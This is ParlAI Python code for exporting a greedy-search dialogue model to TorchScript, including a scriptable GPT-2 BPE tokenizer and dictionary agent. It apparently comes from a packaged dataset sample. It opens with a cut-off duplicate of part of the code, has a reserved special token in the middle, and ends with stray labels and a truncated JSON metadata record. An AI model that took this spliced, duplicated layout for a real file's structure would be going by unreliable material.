            if len(word) == 1:
                break
            else:
                pairs = self.get_pairs(word)
        return word

    def helper_encode(self, text: str) -> List[str]:
        """
        Tokenize text, without any special-token handling.

        :param text:
            text to tokenize
        :return tokens:
            A list of tokens
        """
        bpe_tokens: List[str] = []
        for token in self.findall(text):
            # Map each raw character through the byte encoder, run BPE, then
            # look up each merged symbol in the encoder table.
            byte_encoded: List[str] = []
            for b in token:
                byte_encoded.append(self.byte_encoder[ord(b)])
            encoded: List[str] = []
            for bpe_token in self.bpe(byte_encoded):
                encoded.append(self.encoder[bpe_token])
            bpe_tokens.extend(encoded)
        return bpe_tokens

    def decode(self, tokens: List[str]) -> str:
        """
        Decode list of tokens into a text string.

        Special tokens pass through verbatim; runs of ordinary BPE tokens
        between them are decoded with helper_decode().

        :param tokens:
            list of tokens
        :return text:
            decoded text
        """
        output: List[str] = []
        accum: List[str] = []
        for token in tokens:
            if token in self._special_tokens:
                if len(accum) > 0:
                    output.append(self.helper_decode(accum))
                    accum.clear()
                output.append(token)
            else:
                accum.append(token)
        if len(accum) > 0:
            output.append(self.helper_decode(accum))
        text = ''.join(output)
        if self.add_prefix_space:
            # encode() prepended a space; strip it back off.
            assert text.startswith(' ')
            text = text.lstrip(' ')
        return text

    def helper_decode(self, tokens: List[str]) -> str:
        """
        Decode list of tokens into text string.

        :param tokens:
            list of tokens
        :return:
            decoded text
        """
        chars: List[str] = []
        for token in tokens:
            decoded_token = self.decoder[token]
            token_chars = self.utf8_chars(decoded_token)
            for char in token_chars:
                if not torch.jit.is_scripting():
                    # In eager mode a chunk may span several characters;
                    # split it before byte-decoding.
                    chars.extend(list(char))
                else:
                    chars.append(char)
        decoded_chars: List[str] = []
        for char in chars:
            decoded_chars.append(chr(self.byte_decoder[char]))
        return ''.join(decoded_chars)

    def utf8_chars(self, s: str) -> List[str]:
        """
        An implementation of UTF8 character iteration in TorchScript.

        There are no bitwise operations in torchscript, so we compare directly
        to integer values. There isn't a lot of validation: an improperly
        encoded string (out-of-place continuation byte, wrong byte order)
        gives unexpected results or throws. Torch itself takes in unicode
        strings and encodes them as UTF8, so that should be actively hard to
        do.

        The logic is simple: looking at the current start-of-character byte,
        if its high bit is 0, it's a 1-byte character. Otherwise, the number
        of bytes is the number of leading 1s in its binary representation, so
        find that number by comparing it directly to ints with the
        appropriate representation, then append that many bytes as a
        character and move past them to the next start byte.

        From pytext.torchscript.utils.
        """
        chars: List[str] = []
        i = 0
        while i < len(s):
            byte = ord(s[i])
            if byte < 128:
                chars.append(s[i])
                i += 1
            else:
                if byte < 224:
                    num_bytes = 2
                elif byte < 240:
                    num_bytes = 3
                elif byte < 248:
                    num_bytes = 4
                elif byte < 252:
                    num_bytes = 5
                elif byte < 254:
                    num_bytes = 6
                elif byte < 255:
                    num_bytes = 7
                else:
                    num_bytes = 8
                chars.append(s[i:i + num_bytes])
                i += num_bytes
        return chars
@torch.jit.script
class ScriptableDictionaryAgent:
    """
    Builds and/or loads a dictionary.

    All code is TorchScriptable.
    """

    def __init__(
        self,
        null_token: str,
        end_token: str,
        unk_token: str,
        start_token: str,
        freq: Dict[str, int],
        tok2ind: Dict[str, int],
        ind2tok: Dict[int, str],
        bpe_add_prefix_space: bool,
        bpe_encoder: Dict[str, str],
        bpe_byte_encoder: Dict[int, str],
        fused_key_bpe_ranks: Dict[str, float],
        special_tokens: List[str],
    ):
        # Special-token strings.
        self.null_token = null_token
        self.end_token = end_token
        self.unk_token = unk_token
        self.start_token = start_token
        # Token statistics and the two-way token <-> index maps.
        self.freq = freq
        self.tok2ind = tok2ind
        self.ind2tok = ind2tok
        # Cache the UNK index so out-of-vocabulary lookups are a single read.
        self._unk_token_idx = self.tok2ind[self.unk_token]
        # BPE tokenizer used by (bpe_)tokenize().
        self.bpe = ScriptableGpt2BpeHelper(
            add_prefix_space=bpe_add_prefix_space,
            encoder=bpe_encoder,
            byte_encoder=bpe_byte_encoder,
            fused_key_bpe_ranks=fused_key_bpe_ranks,
            special_tokens=special_tokens,
        )

    def _word_lookup(self, key: str) -> int:
        """
        Return the index for a token, falling back to the UNK index.
        """
        if key not in self.tok2ind:
            return self._unk_token_idx
        return self.tok2ind[key]

    def _index_lookup(self, key: int) -> str:
        """
        Return the token for an index, falling back to the UNK token.
        """
        if key not in self.ind2tok:
            return self.unk_token
        return self.ind2tok[key]

    def gpt2_tokenize(self, text: str):
        """
        Tokenize using Gpt2 BPE tokenizer.
        """
        return self.bpe_tokenize(text)

    def tokenize(self, text: str) -> List[str]:
        """
        Return a sequence of tokens from the input text.

        Special tokens are handled by the underlying BPE tokenizer.
        """
        return self.gpt2_tokenize(text)

    def bpe_tokenize(self, text: str) -> List[str]:
        """
        Return a sequence of BPE-tokens from the text.
        """
        return self.bpe.encode(text)

    def txt2vec(self, text: str) -> List[int]:
        """
        Convert a string to a vector (list of ints).

        First runs a sentence tokenizer, then a word tokenizer.
        """
        indices: List[int] = []
        for tok in self.tokenize(str(text)):
            indices.append(self._word_lookup(tok))
        return indices

    def vec2txt(self, vector: List[int]) -> str:
        """
        Convert a vector of token IDs back into a string.
        """
        token_strs: List[str] = []
        for idx in vector:
            token_strs.append(self._index_lookup(idx))
        return self.bpe.decode(token_strs)
<|reserved_special_token_1|>
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from collections import defaultdict
from typing import List, Dict, Optional, Tuple
import torch.jit
from torch import nn as nn
from parlai.core.dict import DictionaryAgent
from parlai.core.torch_agent import TorchAgent
from parlai.utils.bpe import Gpt2BpeHelper
class TorchScriptGreedySearch(nn.Module):
    """
    A helper class for exporting simple greedy-search models via TorchScript.
    Models with extra inputs will need to override to include more variables.
    """
    # We currently only support these specific dictionary settings
    CAIRAOKE_DICT_PARAMS = {
        "dict_class": "parlai.core.dict:DictionaryAgent",
        "dict_initpath": None,
        "dict_language": "english",
        "dict_max_ngram_size": -1,
        "dict_minfreq": 0,
        "dict_maxtokens": -1,
        "dict_tokenizer": "gpt2",
        "dict_lower": False,
        "dict_textfields": "text,labels",
        "dict_loaded": True,
        'bpe_debug': False,
    }
    def __init__(self, agent: TorchAgent):
        """
        Build a scriptable greedy-search wrapper around a trained agent.

        Copies the dictionary and history settings out of the agent, then
        traces the encoder, both decoder passes, and the output/reorder
        methods with TorchScript.
        """
        super().__init__()
        self.is_bart = agent.opt['model'] == 'bart'
        # Dictionary/tokenization setup
        for key, val in self.CAIRAOKE_DICT_PARAMS.items():
            assert (
                agent.opt.get(key, val) == val
            ), f'The only currently supported value of "{key}" is {val}!'
        orig_dict: DictionaryAgent = agent.dict
        orig_bpe: Gpt2BpeHelper = orig_dict.bpe
        assert all(len(key) == 2 for key in orig_bpe.bpe_ranks.keys())
        assert not any(
            i for key in orig_bpe.bpe_ranks.keys() for i in key if '\n' in i
        ), "We need to temporarily merge the bpe_ranks dict's keys with a newline character in order to use it as a TorchScript arg, but at least one of the dict's keys contains a newline character already!"
        # Fuse each pair key into one '\n'-joined string.
        # Cast the values as floats to be able to compare to float('inf') when doing BPE
        # splitting
        fused_key_bpe_ranks = {
            '\n'.join(key): float(val) for key, val in orig_bpe.bpe_ranks.items()
        }
        # TorchScriptable re-implementation of the dictionary agent.
        self.dict = ScriptableDictionaryAgent(
            null_token=orig_dict.null_token,
            end_token=orig_dict.end_token,
            unk_token=orig_dict.unk_token,
            start_token=orig_dict.start_token,
            freq=orig_dict.freq,
            tok2ind=orig_dict.tok2ind,
            ind2tok=orig_dict.ind2tok,
            bpe_add_prefix_space=agent.opt['bpe_add_prefix_space'],
            bpe_encoder=orig_bpe.encoder,
            bpe_byte_encoder=orig_bpe.byte_encoder,
            fused_key_bpe_ranks=fused_key_bpe_ranks,
            special_tokens=agent._get_special_tokens(),
        )
        # History tracking and start/end tokens
        self.delimiter_tok = agent.history.delimiter_tok
        self.history_size = agent.opt['history_size']
        if agent.opt.get('history_add_global_end_token', None) is not None:
            self.global_end_token = agent.dict[agent.dict.end_token]
        else:
            self.global_end_token = None
        self.text_truncate = agent.opt.get('text_truncate') or agent.opt['truncate']
        self.text_truncate = self.text_truncate if self.text_truncate >= 0 else None
        self.start_idx = agent.model.START_IDX
        self.end_idx = agent.model.END_IDX
        self.null_idx = agent.model.NULL_IDX
        # BART decoding starts from [END, START]; other models from [START].
        if self.is_bart:
            self.initial_decoder_input = [self.end_idx, self.start_idx]
        else:
            self.initial_decoder_input = [self.start_idx]
        agent.model.eval()
        # Create versions of the model and decoder that will flatten the incremental
        # state dict, as required by TorchScript
        wrapped_decoder = DecoderIncrStateFlattener(agent.model.decoder)
        wrapped_model = ModelIncrStateFlattener(agent.model)
        # Create sample inputs for tracing
        sample_tokens = torch.tensor([[1, 2, 3, 4, 5]], dtype=torch.long)
        encoder_states = agent.model.encoder(sample_tokens)
        initial_generations = self._get_initial_decoder_input(sample_tokens)
        latent, initial_incr_state = wrapped_decoder(
            initial_generations, encoder_states
        )
        logits = agent.model.output(latent[:, -1:, :])
        _, preds = logits.max(dim=2)
        # Copy the initial incremental state, used when tracing the
        # .reorder_decoder_incremental_state() method below, to avoid having it be
        # mutated by the following line
        incr_state = {k: torch.clone(v) for k, v in initial_incr_state.items()}
        incr_state = wrapped_model.reorder_decoder_incremental_state(
            incr_state, torch.tensor([0], dtype=torch.long, device=sample_tokens.device)
        )
        generations = torch.cat([initial_generations, preds], dim=1)
        # Do tracing
        self.encoder = torch.jit.trace(agent.model.encoder, sample_tokens)
        # We do strict=False to avoid an error when passing a Dict out of
        # decoder.forward()
        self.decoder_first_pass = torch.jit.trace(
            wrapped_decoder, (initial_generations, encoder_states), strict=False
        )
        self.partially_traced_model = torch.jit.trace_module(
            wrapped_model,
            {
                'output': (latent[:, -1:, :]),
                'reorder_decoder_incremental_state': (
                    initial_incr_state,
                    torch.tensor([0], dtype=torch.long, device=sample_tokens.device),
                ),
            },
            strict=False,
        )
        self.decoder_later_pass = torch.jit.trace(
            wrapped_decoder, (generations, encoder_states, incr_state), strict=False
        )
    def _get_initial_decoder_input(self, x: torch.Tensor) -> torch.Tensor:
        """
        Workaround because we can't use TGM._get_initial_decoder_input() directly.
        When we try to call that function, we get a "RuntimeError: Type 'Tuple[int,
        int]' cannot be traced. Only Tensors and (possibly nested) Lists, Dicts, and
        Tuples of Tensors can be traced" error.
        """
        bsz = x.size(0)
        return (
            torch.tensor(self.initial_decoder_input, dtype=torch.long)
            .expand(bsz, len(self.initial_decoder_input))
            .to(x.device)
        )
    def parse(self, text: str) -> List[int]:
        """
        Tokenize a string into a list of token indices.
        """
        return self.dict.txt2vec(text)
    def _v2t(self, vec: List[int]) -> str:
        """
        Convert token indices to string of tokens.
        """
        new_vec: List[int] = []
        for i in vec:
            if i == self.end_idx:
                break
            elif i != self.start_idx:
                new_vec.append(i)
        return self.dict.vec2txt(new_vec)
    def forward(self, context: str, max_len: int = 128) -> str:
        """
        Greedily decode a response to the given newline-delimited context.
        """
        # Vectorize all lines of context
        history_vecs: List[List[int]] = []
        context_lines = context.split('\n')
        if self.history_size > 0:
            context_lines = context_lines[-self.history_size :]
        for line in context_lines:
            history_vecs.append(self.parse(line))
        # Get full history vec
        text_vecs: List[List[int]] = []
        for vec in history_vecs[:-1]:
            text_vecs += [vec]
            text_vecs += [self.delimiter_tok]
        text_vecs += [history_vecs[-1]]
        if self.global_end_token is not None:
            text_vecs += [[self.global_end_token]]
        # Flatten text_vecs
        flattened_text_vec: List[int] = []
        for vec in text_vecs:
            for token in vec:
                flattened_text_vec.append(token)
        # Format history vec given various logic
        if self.text_truncate is not None:
            if self.is_bart:
                truncate_length = self.text_truncate - 2  # Start and end tokens
            else:
                truncate_length = self.text_truncate
            if len(flattened_text_vec) > truncate_length:
                flattened_text_vec = flattened_text_vec[-truncate_length:]
        flattened_text_vec = torch.tensor(flattened_text_vec, dtype=torch.long)
        if self.is_bart:
            flattened_text_vec = torch.cat(
                [
                    torch.tensor([self.start_idx], dtype=torch.long),
                    flattened_text_vec,
                    torch.tensor([self.end_idx], dtype=torch.long),
                ],
                dim=0,
            )
        # Pass through the encoder and decoder to generate tokens
        batch_text_vec = torch.unsqueeze(flattened_text_vec, dim=0)  # Add batch dim
        encoder_states = self.encoder(batch_text_vec)
        generations = self._get_initial_decoder_input(batch_text_vec)
        # keep track of early stopping if all generations finish
        seen_end = torch.zeros(
            batch_text_vec.size(0), device=batch_text_vec.device, dtype=torch.bool
        )
        incr_state: Dict[str, torch.Tensor] = {}
        for token_idx in range(max_len):
            if token_idx == 0:
                # First pass has no incremental state yet.
                latent, incr_state = self.decoder_first_pass(
                    generations, encoder_states
                )
            else:
                latent, incr_state = self.decoder_later_pass(
                    generations, encoder_states, incr_state
                )
            logits = self.partially_traced_model.output(latent[:, -1:, :])
            _, preds = logits.max(dim=2)
            incr_state = self.partially_traced_model.reorder_decoder_incremental_state(
                incr_state,
                torch.tensor([0], dtype=torch.long, device=batch_text_vec.device),
            )
            seen_end = seen_end + (preds == self.end_idx).squeeze(1)
            generations = torch.cat([generations, preds], dim=1)
            if torch.all(seen_end):
                break
        # Get the label from the generated tokens and update the history
        if self.is_bart:
            # Hack: remove initial end token. I haven't found in the code where this is
            # done, but it seems to happen early on during generation
            assert generations[0, 0].item() == self.end_idx
            generations = generations[:, 1:]
        generation_tokens: List[int] = generations[0].tolist()
        label = self._v2t(generation_tokens)
        return label
class BaseIncrStateFlattener(nn.Module):
    """
    Flatten/unflatten the incremental state for use with TorchScripting.
    Typically, the incremental state will be stored as a Dict[int, Dict[str, Dict[str,
    torch.Tensor]]], where the 3 dictionary levels map decoder layer, attention type,
    and previous key/value/mask, respectively. However, TorchScript expects dicts to be
    of type Dict[str, torch.Tensor], and thus all input incremental states when
    TorchScripting will have to be of that type. We thus unflatten the input incremental
    state, already of type Dict[str, torch.Tensor], to pass it into whatever method
    needs it, and we flatten it again after the updated incremental state is passed back
    out.
    This is a base class that provides methods for flattening/unflattening: subclasses
    will call these methods as the incremental state is passed into and out of their own
    methods.
    """
    def __init__(self, module: nn.Module):
        super().__init__()
        # The wrapped module whose incremental state we translate.
        self.module = module
    def _unflatten_incr_state(
        self, flat_incr_state: Dict[str, torch.Tensor]
    ) -> Dict[int, Dict[str, Dict[str, torch.Tensor]]]:
        """
        Unflatten the input incremental state.
        For instance, flat_incr_state['0__self_attn__prev_key'] will be stored in
        structured_incr_state[0]['self_attn']['prev_key'].
        """
        structured_incr_state = defaultdict(lambda: defaultdict(dict))
        for key, state in flat_incr_state.items():
            layer_idx_str, attn_type, state_type = key.split('__')
            structured_incr_state[int(layer_idx_str)][attn_type][state_type] = state
        # Turn the nested defaultdicts back into regular dicts
        return dict({k: dict(v) for k, v in structured_incr_state.items()})
    def _flatten_incr_state(
        self, structured_incr_state: Dict[int, Dict[str, Dict[str, torch.Tensor]]]
    ) -> Dict[str, torch.Tensor]:
        """
        Flatten the input incremental state.
        For instance, structured_incr_state[0]['self_attn']['prev_key'] will be stored
        in flat_incr_state['0__self_attn__prev_key'].
        """
        flat_incr_state = {}
        for layer_idx, dict1 in structured_incr_state.items():
            for attn_type, dict2 in dict1.items():
                for state_type, state in dict2.items():
                    key = f'{layer_idx:d}__{attn_type}__{state_type}'
                    flat_incr_state[key] = state
        return flat_incr_state
class DecoderIncrStateFlattener(BaseIncrStateFlattener):
    """
    Wrapper around a TransformerDecoder that speaks the flat incremental-state
    format.

    Any flat state passed into .forward() is expanded into the nested form
    before being handed to the wrapped decoder, and the updated nested state is
    flattened again on the way out.
    """

    def forward(
        self,
        input_: torch.LongTensor,
        encoder_state: Tuple[torch.Tensor, torch.Tensor],
        flat_incr_state: Optional[Dict[str, torch.Tensor]] = None,
    ) -> Tuple[torch.Tensor, Dict[str, torch.Tensor]]:
        # On the very first decoding step there is no incremental state yet
        if flat_incr_state is None:
            structured_incr_state = None
        else:
            structured_incr_state = self._unflatten_incr_state(flat_incr_state)
        tensor, updated_incr_state = self.module.forward(
            input=input_, encoder_state=encoder_state, incr_state=structured_incr_state
        )
        return tensor, self._flatten_incr_state(updated_incr_state)
class ModelIncrStateFlattener(BaseIncrStateFlattener):
    """
    Wrapper around a TransformerGeneratorModel that speaks the flat
    incremental-state format.

    .reorder_decoder_incremental_state() unflattens its input state before
    delegating to the wrapped model and flattens the reordered result.
    .output() is exposed as well, since it is also traced.
    """

    def reorder_decoder_incremental_state(
        self, flat_incr_state: Dict[str, torch.Tensor], inds: torch.Tensor
    ) -> Dict[str, torch.Tensor]:
        nested_state = self._unflatten_incr_state(flat_incr_state)
        reordered_state = self.module.reorder_decoder_incremental_state(
            incremental_state=nested_state, inds=inds
        )
        return self._flatten_incr_state(reordered_state)

    def output(self, tensor: torch.Tensor) -> torch.Tensor:
        # Pure pass-through to the wrapped model's output projection
        return self.module.output(tensor)
@torch.jit.script
class ScriptableGpt2BpeHelper(object):
    """
    Version of parlai.utils.bpe.Gpt2BpeHelper that can be TorchScripted.

    Tokenization follows GPT-2's byte-level BPE: text is split into coarse
    tokens (findall), each token's bytes are mapped to unicode symbols
    (byte_encoder), adjacent symbols are greedily merged by rank (bpe), and the
    merged symbols are looked up in the encoder table.
    """

    @classmethod
    def findall(cls, text: str) -> List[str]:
        """
        Split tokens in a manner that replicates parlai.utils.bpe.Gpt2BpeHelper.
        """
        contraction_endings = ['s', 't', 're', 've', 'm', 'll', 'd']

        tokens: List[str] = []
        idx = 0
        num_passes = 0
        while idx < len(text):
            num_passes += 1
            if num_passes > 10000:
                # Safety valve: every branch below should advance idx each pass
                return ['*** Infinite loop in ScriptableGpt2BpeHelper.findall()! ***']
            if text[idx] == "'":
                # Capture contradiction suffixes
                captured_suffix = False
                for ending in contraction_endings:
                    if text[idx + 1 : idx + 1 + len(ending)] == ending:
                        tokens.append("'" + ending)
                        idx += 1 + len(ending)
                        captured_suffix = True
                        break
                if captured_suffix:
                    continue
            if not text[idx].isspace() or (
                text[idx] == ' ' and idx + 1 < len(text) and not text[idx + 1].isspace()
            ):
                # Capture runs of one type of character
                if text[idx] == ' ':
                    last_matching_idx = idx + 1
                else:
                    last_matching_idx = idx
                if text[last_matching_idx].isalpha():
                    while (
                        last_matching_idx + 1 < len(text)
                        and text[last_matching_idx + 1].isalpha()
                    ):
                        last_matching_idx += 1
                elif text[last_matching_idx].isnumeric():
                    while (
                        last_matching_idx + 1 < len(text)
                        and text[last_matching_idx + 1].isnumeric()
                    ):
                        last_matching_idx += 1
                else:
                    while (
                        last_matching_idx + 1 < len(text)
                        and not text[last_matching_idx + 1].isspace()
                        and not text[last_matching_idx + 1].isalpha()
                        and not text[last_matching_idx + 1].isnumeric()
                    ):
                        last_matching_idx += 1
                tokens.append(text[idx : last_matching_idx + 1])
                idx = last_matching_idx + 1
                continue
            if idx + 1 < len(text) and text[idx + 1].isspace():
                # Capture runs of space characters up until just before the final one
                last_space_idx = idx + 1
                while (
                    last_space_idx + 1 < len(text)
                    and text[last_space_idx + 1].isspace()
                ):
                    last_space_idx += 1
                if last_space_idx + 1 == len(text):
                    # Include the last char, which is a space char
                    tokens.append(text[idx : last_space_idx + 1])
                    idx = last_space_idx + 1
                else:
                    tokens.append(text[idx:last_space_idx])
                    idx = last_space_idx
                continue
            if True:
                # Always taken: final fallback case (runs of space characters),
                # written as a guarded block to mirror the branches above
                last_space_idx = idx
                while (
                    last_space_idx + 1 < len(text)
                    and text[last_space_idx + 1].isspace()
                ):
                    last_space_idx += 1
                tokens.append(text[idx : last_space_idx + 1])
                idx = last_space_idx + 1
        return tokens

    def __init__(
        self,
        add_prefix_space: bool,
        encoder: Dict[str, str],
        byte_encoder: Dict[int, str],
        fused_key_bpe_ranks: Dict[str, float],
        special_tokens: List[str],
    ):
        """
        :param add_prefix_space: if True, encode() prepends a space to the text
        :param encoder: BPE symbol -> output token string
        :param byte_encoder: raw byte value -> unicode symbol character
        :param fused_key_bpe_ranks: newline-fused symbol pair -> merge rank
        :param special_tokens: tokens that must never be split by BPE
        """
        self.add_prefix_space = add_prefix_space
        self.encoder = encoder
        # Inverse of encoder, for decoding
        self.decoder: Dict[str, str] = {}
        for k, v in self.encoder.items():
            self.decoder[v] = k
        self.byte_encoder = byte_encoder
        # Inverse of byte_encoder, for decoding
        self.byte_decoder: Dict[str, int] = {}
        for k, v in self.byte_encoder.items():
            self.byte_decoder[v] = k
        self.bpe_ranks = fused_key_bpe_ranks

        # special tokens, stored as a dict used as a set of token strings
        self._special_tokens: Dict[str, int] = {}
        for st in special_tokens:
            self._special_tokens[st] = 1

    def encode(self, text: str) -> List[str]:
        """
        Tokenize text.

        Checks for add_prefix_space; handles accordingly.

        :param text:
            text to tokenize

        :return tokens:
            A list of tokens
        """
        if self.add_prefix_space:
            text = f' {text}'

        # constants for readability
        FINAL = 1
        SPLITABLE = 0
        pieces: List[Tuple[str, int]] = [(text, SPLITABLE)]
        for special_token in self._special_tokens.keys():
            i = 0
            while i < len(pieces):
                subtext, status = pieces[i]
                if status == FINAL:
                    i += 1
                    continue
                split = subtext.split(special_token)
                if len(split) > 1:
                    # special token detected, replace the chunk with small subchunks
                    # split by the special token
                    pieces.pop(i)
                    for j, piece in enumerate(split):
                        if j > 0:
                            # add the special token as a delimiter
                            pieces.insert(i + j, (special_token, FINAL))
                        pieces.insert(i + j + int(j > 0), (piece, SPLITABLE))
                else:
                    i += 1

        output: List[str] = []
        for piece, state in pieces:
            if state == FINAL:
                # Special tokens are emitted verbatim, never BPE-split
                output.append(piece)
            else:
                output += self.helper_encode(piece)
        return output

    def get_pairs(self, word: List[str]) -> List[Tuple[str, str]]:
        """
        Return set of symbol pairs in a word.

        Word is represented as list of symbols (symbols being variable-length strings).

        :param word:
            word to symbolize

        :return pairs:
            set of tuples of symbols
        """
        pairs: List[Tuple[str, str]] = []
        prev_char = word[0]
        for char in word[1:]:
            pairs.append((prev_char, char))
            prev_char = char
        return pairs

    def bpe(self, word: List[str]) -> List[str]:
        """
        Convert token to BPE.

        :param word:
            list of tokens token to convert

        :return bpe_encoding:
            string bpe encoding
        """
        pairs = self.get_pairs(word)
        if len(pairs) == 0:
            return word

        while True:
            # Find the lowest-ranked adjacent pair; rank keys are the two
            # symbols fused with a newline
            min_rank = self.bpe_ranks.get('\n'.join(pairs[0]), float('inf'))
            bigram = pairs[0]
            for pair in pairs[1:]:
                current_rank = self.bpe_ranks.get('\n'.join(pair), float('inf'))
                if current_rank < min_rank:
                    min_rank = current_rank
                    bigram = pair
            if '\n'.join(bigram) not in self.bpe_ranks:
                # No mergeable pair remains
                break
            first, second = bigram
            new_word: List[str] = []
            i = 0
            while i < len(word):
                found = False
                for j in range(i, len(word)):
                    if word[j] == first:
                        new_word.extend(word[i:j])
                        i = j
                        found = True
                        break
                if not found:
                    new_word.extend(word[i:])
                    break
                if word[i] == first and i < len(word) - 1 and word[i + 1] == second:
                    new_word.append(first + second)
                    i += 2
                else:
                    new_word.append(word[i])
                    i += 1
            word = new_word.copy()
            if len(word) == 1:
                break
            else:
                pairs = self.get_pairs(word)
        return word

    def helper_encode(self, text: str) -> List[str]:
        """
        Tokenize text.

        :param text:
            text to tokenize

        :return tokens:
            A list of tokens
        """
        bpe_tokens: List[str] = []
        for token in self.findall(text):
            # Map each byte of the token to its unicode symbol
            byte_encoded: List[str] = []
            for b in token:
                byte_encoded.append(self.byte_encoder[ord(b)])
            encoded: List[str] = []
            for bpe_token in self.bpe(byte_encoded):
                encoded.append(self.encoder[bpe_token])
            bpe_tokens.extend(encoded)
        return bpe_tokens

    def decode(self, tokens: List[str]) -> str:
        """
        Decode list of tokens into a text string.

        :param tokens:
            list of tokens

        :return text:
            decoded text
        """
        output: List[str] = []
        # Accumulate runs of ordinary tokens so each run is BPE-decoded as a
        # unit; special tokens pass through verbatim
        accum: List[str] = []
        for token in tokens:
            if token in self._special_tokens:
                if len(accum) > 0:
                    output.append(self.helper_decode(accum))
                    accum.clear()
                output.append(token)
            else:
                accum.append(token)
        if len(accum) > 0:
            output.append(self.helper_decode(accum))

        text = ''.join(output)
        if self.add_prefix_space:
            assert text.startswith(' ')
            text = text.lstrip(' ')
        return text

    def helper_decode(self, tokens: List[str]) -> str:
        """
        Decode list of tokens into text string.

        :param tokens:
            list of tokens

        :return:
            decoded text
        """
        chars: List[str] = []
        for token in tokens:
            decoded_token = self.decoder[token]
            token_chars = self.utf8_chars(decoded_token)
            for char in token_chars:
                if not torch.jit.is_scripting():
                    # We iterate over "char", which is supposed to be a single
                    # character, because the TorchScripted version of the code
                    # correctly splits a string into single characters in
                    # self.utf8_chars() but the non-TorchScripted version doesn't
                    chars.extend(list(char))
                else:
                    chars.append(char)
        decoded_chars: List[str] = []
        for char in chars:
            decoded_chars.append(chr(self.byte_decoder[char]))
        return ''.join(decoded_chars)

    def utf8_chars(self, s: str) -> List[str]:
        """
        An implementation of UTF8 character iteration in TorchScript. There are no
        bitwise operations in torchscript, so we compare directly to integer values.
        There isn't a lot of validation, for instance if you pass in an improperly
        encoded string with an out-of-place continuation byte, or with a non-left-to-
        right byte order, you'll get unexpected results and likely throw. Torch itself
        takes in unicode strings and encodes them as UTF8, so that should be actively
        hard to do.

        The logic is simple: looking at the current start-of-character byte.
        If its high bit is 0, it's a 1-byte character. Otherwise, the number of
        bytes is the number of leading 1s in its binary representation, so
        find that number by comparing it directly to ints with the appropriate
        representation, then append that many bytes as a character and move past
        them to the next start byte.

        From pytext.torchscript.utils.
        """
        chars: List[str] = []
        i = 0
        while i < len(s):
            byte = ord(s[i])
            if byte < 0b10000000:
                chars.append(s[i])
                i += 1
            else:
                if byte < 0b11100000:
                    num_bytes = 2
                elif byte < 0b11110000:
                    num_bytes = 3
                elif byte < 0b11111000:
                    num_bytes = 4
                elif byte < 0b11111100:
                    num_bytes = 5
                elif byte < 0b11111110:
                    num_bytes = 6
                elif byte < 0b11111111:
                    num_bytes = 7
                else:
                    num_bytes = 8
                chars.append(s[i : i + num_bytes])
                i += num_bytes
        return chars
@torch.jit.script
class ScriptableDictionaryAgent:
    """
    Builds and/or loads a dictionary.
    All code is TorchScriptable.
    """
    def __init__(
        self,
        null_token: str,
        end_token: str,
        unk_token: str,
        start_token: str,
        freq: Dict[str, int],
        tok2ind: Dict[str, int],
        ind2tok: Dict[int, str],
        bpe_add_prefix_space: bool,
        bpe_encoder: Dict[str, str],
        bpe_byte_encoder: Dict[int, str],
        fused_key_bpe_ranks: Dict[str, float],
        special_tokens: List[str],
    ):
        """
        Store special-token strings and vocab tables, and build the GPT-2 BPE
        tokenizer.

        :param freq: token -> frequency table (stored; not read by the methods here)
        :param tok2ind: token string -> vocabulary index
        :param ind2tok: vocabulary index -> token string (inverse of tok2ind)
        :param bpe_add_prefix_space: if True, the tokenizer prepends a space to text
        :param bpe_encoder: BPE symbol -> token-string table for the tokenizer
        :param bpe_byte_encoder: byte value -> unicode symbol table for the tokenizer
        :param fused_key_bpe_ranks: newline-fused symbol pair -> BPE merge rank
        :param special_tokens: tokens the BPE tokenizer must never split
        """
        self.null_token = null_token
        self.end_token = end_token
        self.unk_token = unk_token
        self.start_token = start_token
        self.freq = freq
        self.tok2ind = tok2ind
        self.ind2tok = ind2tok
        # cache unk token for later
        self._unk_token_idx = self.tok2ind[self.unk_token]
        # Initialize tokenizer
        self.bpe = ScriptableGpt2BpeHelper(
            add_prefix_space=bpe_add_prefix_space,
            encoder=bpe_encoder,
            byte_encoder=bpe_byte_encoder,
            fused_key_bpe_ranks=fused_key_bpe_ranks,
            special_tokens=special_tokens,
        )
    def _word_lookup(self, key: str) -> int:
        """
        Return the vocabulary index of the token, falling back to the unk
        token's index when the token is out of vocabulary.
        """
        if key in self.tok2ind:
            return self.tok2ind[key]
        else:
            return self._unk_token_idx
    def _index_lookup(self, key: int) -> str:
        """
        Return the token string for the given index, or unk_token if the index
        is not in the vocabulary.
        """
        if key in self.ind2tok:
            return self.ind2tok[key]
        else:
            return self.unk_token
    def gpt2_tokenize(self, text: str) -> List[str]:
        """
        Tokenize using Gpt2 BPE tokenizer.
        """
        return self.bpe_tokenize(text)
    def tokenize(self, text: str) -> List[str]:
        """
        Return a sequence of tokens from the iterable.
        Also handles special tokens for some tokenizers
        """
        # Only the GPT-2 BPE tokenizer is supported in this scripted agent
        word_tokens = self.gpt2_tokenize(text)
        return word_tokens
    def bpe_tokenize(self, text: str) -> List[str]:
        """
        Return a sequence of BPE-tokens from the text.
        """
        return self.bpe.encode(text)
    def txt2vec(self, text: str) -> List[int]:
        """
        Convert a string to a vector (list of ints).
        Tokenizes the text and maps each token to its vocabulary index
        (unknown tokens map to the unk index).
        """
        itr: List[int] = []
        for token in self.tokenize(str(text)):
            itr.append(self._word_lookup(token))
        return itr
    def vec2txt(self, vector: List[int]) -> str:
        """
        Convert a vector of IDs to a string.
        Maps each index back to its token string and BPE-decodes the result
        into text.
        """
        tokens = [self._index_lookup(idx) for idx in vector]
        text = self.bpe.decode(tokens)
        return text
|
flexible
|
{
"blob_id": "27d5ff5b0253eea36d6b492e929c4220f4b4a5eb",
"index": 1564,
